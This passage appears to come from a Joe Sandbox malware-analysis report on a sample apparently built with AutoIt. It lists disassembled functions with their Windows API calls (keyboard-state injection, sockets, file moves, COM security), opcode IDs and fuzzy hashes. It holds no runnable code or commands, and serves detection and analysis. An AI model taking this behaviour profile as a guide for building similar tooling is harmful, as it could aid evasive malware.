                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB4117306083989EC739CB3CF998B7A7BB5AB4B311F24453CE98757EA0C631A881C711
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00AA37B7
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00AA37BF
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA37CA
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00AA37D6
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00AA3812
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AA3823
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AA6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00AA385E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AA387D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 54d1c6ccb36370607ddfe8bdfcc2d527fb60c703b068eef2d4eab2c4c643dd76
                                                                                                                                                                                                                                                                                                    • Instruction ID: 739254f157759ecbf844a52dccdd66c903f43f5bd5461b6569b6e2640863c3b1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54d1c6ccb36370607ddfe8bdfcc2d527fb60c703b068eef2d4eab2c4c643dd76
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4318D72201214BFEB158F90CC89FEB3BA9EB4A751F044065FE499A1D1C7B59841C7A0
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                                                                                                                                                                                    • Opcode ID: 702770c299210c266ccb975c54c7d27efd2e9e6b08045c5ef0244f1c788fa7b5
                                                                                                                                                                                                                                                                                                    • Instruction ID: ef5a4a9a01ce7d5a1c8ab7286e24b1e8f1a5a9fe571acb6deb4718be0ed613f6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 702770c299210c266ccb975c54c7d27efd2e9e6b08045c5ef0244f1c788fa7b5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80D18C71F0060AAFDF11CFA8C886AAEB7F5BF48304F148569E915AB281E770ED45CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00A5194E
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A519D1
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00A51B7B,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A51A64
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A51A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A36A79,?,0000015D,?,?,?,?,00A385B0,000000FF,00000000,?,?), ref: 00A43BC5
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00A51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00A51AF7
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A51B22
                                                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00A51B2E
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f36e2e1076aeeb7d83c50f86630a66586e12ef4bfe872ccd996e8f4612f2e776
                                                                                                                                                                                                                                                                                                    • Instruction ID: e3c868f25e6bd2a53d13fdd393141b0c87f6ddbf309e1b0c2ee4fb0bc2d959b4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f36e2e1076aeeb7d83c50f86630a66586e12ef4bfe872ccd996e8f4612f2e776
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E291B072E00216AADB218FA4C891BFEBBB5BF49351F190219ED11E7280E735CC49C7A0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                                                    • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                                                    • Opcode ID: 997d1ecc782da01663454ccf73b9feaaab5a5b1d1c666b47493f189bb38672ff
                                                                                                                                                                                                                                                                                                    • Instruction ID: 50d5d6a8bb7b336e86c59978eb344c07a7a52dd9b826a0e092571fd0719524cf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 997d1ecc782da01663454ccf73b9feaaab5a5b1d1c666b47493f189bb38672ff
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86919B71E00619AFDF25DFA4C88AFAEBBF8AF45714F108619F505AB280D7709945CFA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A81C1B
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81C43
                                                                                                                                                                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00A81C67
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81C97
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81D1E
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81D83
                                                                                                                                                                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00A81DEF
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2550207440-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b99a13f14bfafa9ebb9aa3170de94d6e43a5ca636f711305c0a9f727cb7664c
                                                                                                                                                                                                                                                                                                    • Instruction ID: e61305e1702f3a7fce46b05c3e7058631f731d015938ed7994046504580a8a2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b99a13f14bfafa9ebb9aa3170de94d6e43a5ca636f711305c0a9f727cb7664c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A691F3B5A00219AFDB00EF98C885BFEB7B8FF05711F144429E951EB291E774E942CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00A943C8
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00A944D7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A944E7
                                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00A9467C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8169E: VariantInit.OLEAUT32(00000000), ref: 00A816DE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8169E: VariantCopy.OLEAUT32(?,?), ref: 00A816E7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A8169E: VariantClear.OLEAUT32(?), ref: 00A816F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                                                    • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8ab11a9b0f5a720f448abde69cb5cd7e3351ad219c0c51bb0720c0f260896a63
                                                                                                                                                                                                                                                                                                    • Instruction ID: e97d5400650a05f409eb8c4b9c9282e18ff35befe8118c11a6ebc4b1ffdbe582
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab11a9b0f5a720f448abde69cb5cd7e3351ad219c0c51bb0720c0f260896a63
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 549148746083019FCB04DF64C58196ABBE5FF89714F14892DF88A97351DB31ED46CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?,?,00A70C4E), ref: 00A7091B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70936
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?,?), ref: 00A70944
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A708FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A70831,80070057,?), ref: 00A70954
                                                                                                                                                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00A956AE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A957B6
                                                                                                                                                                                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00A9582C
                                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 00A95837
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                    • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0df2ee56318241ec7eb52b68f0c45ef1a1824b48a2f0882bb0a6f0106bebaec2
                                                                                                                                                                                                                                                                                                    • Instruction ID: e99a69dd41085440d89ba8f1c99148cd3a65748c4d248b04be9259533a311e91
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0df2ee56318241ec7eb52b68f0c45ef1a1824b48a2f0882bb0a6f0106bebaec2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE911671D00219EFDF15DFA4DC81AEEB7B9BF08314F108569E915A7291EB309A45CFA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 00AA2C1F
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00AA2C51
                                                                                                                                                                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00AA2C79
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA2CAF
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 00AA2CE9
                                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 00AA2CF7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00A743AD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: GetCurrentThreadId.KERNEL32 ref: 00A743B4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00A72F00), ref: 00A743BB
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AA2D7F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7F292: Sleep.KERNEL32 ref: 00A7F30A
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4196846111-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00AA8992
                                                                                                                                                                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00AA899E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00AA8A79
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00AA8AAC
                                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,00000000), ref: 00AA8AE4
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 00AA8B06
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00AA8B1E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 00A7B8C0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00A7B8D5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00A7B936
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00A7B964
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00A7B983
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00A7B9C4
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A7B9E7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetParent.USER32(00000000), ref: 00A7B6E0
                                                                                                                                                                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00A7B6F5
                                                                                                                                                                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00A7B756
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A7B782
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A7B79F
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A7B7DE
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A7B7FF
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00A45F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00A457E3
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00A4585E
                                                                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 00A45879
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00A4589F
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,00A45F16,00000000,?,?,?,?,?,?,?,?,?,00A45F16,?), ref: 00A458BE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,00A45F16,00000000,?,?,?,?,?,?,?,?,?,00A45F16,?), ref: 00A458F7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00A330BB
                                                                                                                                                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00A330C3
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00A33151
                                                                                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00A3317C
                                                                                                                                                                                                                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00A331D1
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A93AD7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A93AAB: _wcslen.LIBCMT ref: 00A93AF8
                                                                                                                                                                                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A91B6F
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A91B7E
                                                                                                                                                                                                                                                                                                    • WSAGetLastError.WSOCK32 ref: 00A91C26
                                                                                                                                                                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00A91C56
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2675159561-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A7D7CD,?), ref: 00A7E714
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A7D7CD,?), ref: 00A7E72D
                                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00A7D7F0
                                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00A7D82A
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7D8B0
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7D8C6
                                                                                                                                                                                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 00A7D90C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                                                                                    • String ID: \*.*
                                                                                                                                                                                                                                                                                                    • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00AA38B8
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA38EB
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA3920
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00AA3952
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00AA397C
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA398D
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA39A7
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f6d78112bbdcfbb9f78c35a155437bd84bb116d0ab035db12b494cc36ed12e57
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4e2e702fb6215abd64ee60587a915aa3e2c90ff047b5a52397e3f32442c2093a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6d78112bbdcfbb9f78c35a155437bd84bb116d0ab035db12b494cc36ed12e57
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5313232644291AFDB21CF88DC95F6937A4FB8A710F1411A8F5558F2F2CBB4A946CB11
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A780D0
                                                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A780F6
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00A780F9
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00A78117
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00A78120
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 00A78145
                                                                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 00A78153
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
